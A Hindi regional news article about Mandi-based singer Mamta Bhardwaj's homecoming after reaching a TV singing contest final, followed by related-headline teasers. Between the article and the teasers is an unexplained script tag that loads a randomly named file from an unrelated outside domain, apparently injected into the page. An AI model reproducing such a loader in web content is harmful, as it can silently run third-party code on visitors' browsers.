<p>हिमाचल प्रदेश की मशहूर गायिका ममता भारद्वाज ने अपनी मेहनत और दमदार आवाज़ से निजी चैनल के रियल्टी सिंगिंग शो के फाइनल राउंड में पहुंच कर हिमाचल प्रदेश का नाम रोशन किया है। मुम्बई से वीरवार दोपहर अपने गृह क्षेत्र ज़िला मंडी के चैलचौक बाज़ार में पहुंचने पर ममता भारद्वाज का उनके परिजनों के साथ साथ जनता ने बैंड बाजे के साथ फूल मालाएं पहना कर जोरदार भव्य स्वागत किया। परिवार और पूरे इलाके की जनता अपनी प्यारी बेटी के इंतजार में सुबह से ही इंतज़ार कर रहे थे।</p>
<p>जैसे ही ममता भारद्वाज चैलचौक पहुंची तो परिवार ने अपनी लाडली को गले से लगा लिया। वो पल इतने गौरवमयी थे कि खुशी में लोगों की आंखें भर आयीं। ममता ने सभी का हाथ जोड़ कर धन्यवाद किया और बड़ों के पैर छूकर आशीर्वाद भी लिया। ममता भारद्वाज के पिता राजेन्द्र भारद्वाज ने बताया कि आज उनकी बेटी ने उन्हें धन्य कर दिया और उनको उनकी बेटी के नाम से जाना जा रहा है। ज्ञात रहे कि इससे पहले भी ममता भारद्वाज वॉइस ऑफ मंडी और वॉइस ऑफ विंटर कार्निवल का खिताब अपने नाम कर चुकी हैं।</p>
<p>ममता प्रोफेशनल सिंगर है और हिमाचल के साथ-साथ पूरे भारत में अपने लाइव शो कर चुकी हैं। ममता ने बताया कि अब जल्दी ही ज़ी सारेगामापा पंजाबी का ग्रैंड फिनाले चंडीगड़ में होगा जिसकी तारीख अभी तय नहीं है। ममता ने हिमाचल की जनता के साथ प्रेदश के मीडिया, अपने गुरुजनों, परिवार और खासकर अपने पति विपिन का दिल से धन्यवाद किया। साथ ही जनता से आगे भी इसी तरह से प्यार और आशीर्वाद बनाये रखने की अपील की है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
Himachal Cooperative Sector Development: मंडी जिले के तरोट गांव में आयोजित हिमाचल प्रदेश राज्य सहकारी…
NSS Camp Day 6 Highlights.: धर्मशाला के राजकीय छात्र वरिष्ठ माध्यमिक पाठशाला में चल रहे…
Bhota Hospital Land Transfer: हिमाचल प्रदेश की सुक्खू सरकार राधास्वामी सत्संग व्यास अस्पताल भोटा की…
Mandi Literacy Committee: हिमाचल ज्ञान विज्ञान समिति ने शनिवार को शिमला स्थित हिमाचल प्रदेश विश्वविद्यालय…
हिमाचल प्रदेश के मंडी जिले में एक हैरान कर देने वाला मामला सामने आया है,…
Priyanka Gandhi Wayanad victory: कांग्रेस नेता प्रियंका गांधी जल्द ही हिमाचल प्रदेश के शिमला पहुंचेंगी।…